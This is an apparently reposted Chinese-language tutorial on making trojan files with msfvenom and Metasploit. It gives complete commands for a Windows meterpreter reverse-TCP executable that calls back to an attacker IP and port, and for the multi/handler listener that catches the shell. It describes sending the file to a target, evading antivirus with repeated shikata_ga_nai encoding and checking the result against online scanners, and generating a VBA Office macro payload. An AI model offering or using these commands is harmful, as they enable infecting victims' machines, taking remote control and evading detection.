利用msfvenom生成木馬文件


  當我們需要往目標機上傳木馬文件時,我們就可以利用msfvenom生成一個木馬文件,並用metersploit進行監聽,就能夠反彈回shell。

  我們制作的木馬文件有沒有免殺功能,可以在virscan中進行掃描檢測一下。

https://www.virscan.org/
或者在本地用一些殺毒軟件進行檢測。

常規利用

  1. 生成windows木馬程序。

   生成一個windows的木馬應用程序:back.exe,並反彈shell至192.168.91.132:8836端口。我們可以利用metersploit進行監聽

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.132 LPORT=8836 -f exe -o back.exe
-p 是payload,就是控制目標主機以后,要讓他干什么。具體的命令就是payload.
-f 是生成的后門的格式。
-o 是輸出文件名

  2. 將木馬程序發送給目標機。

  3. 在自己的kali中開啟metersploit。

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.91.132 #這里的IP地址就是我們木馬文件中要反彈的IP地址
set LPORT 8836
run

  4. 目標機點擊了back.exe。

   當目標機運行了木馬程序時,我們msf這邊就上線了,一般這種的會被殺毒軟件發現,要想不被發現,就要制作免殺木馬程序。

 制作免殺木馬

msfvenom -l encoders  #查看有哪些編碼格式。
-e x86/shikata_ga_nai 對木馬編碼進行免殺
-i 5 指定編碼5次,這個次數可以隨便修改。
-b '\x00' 指定一些壞字節。

 office宏攻擊的payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip地址 LPORT=端口 -f vba -o nouyan.vba
-f vba 是生成vba宏語言的payload.

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM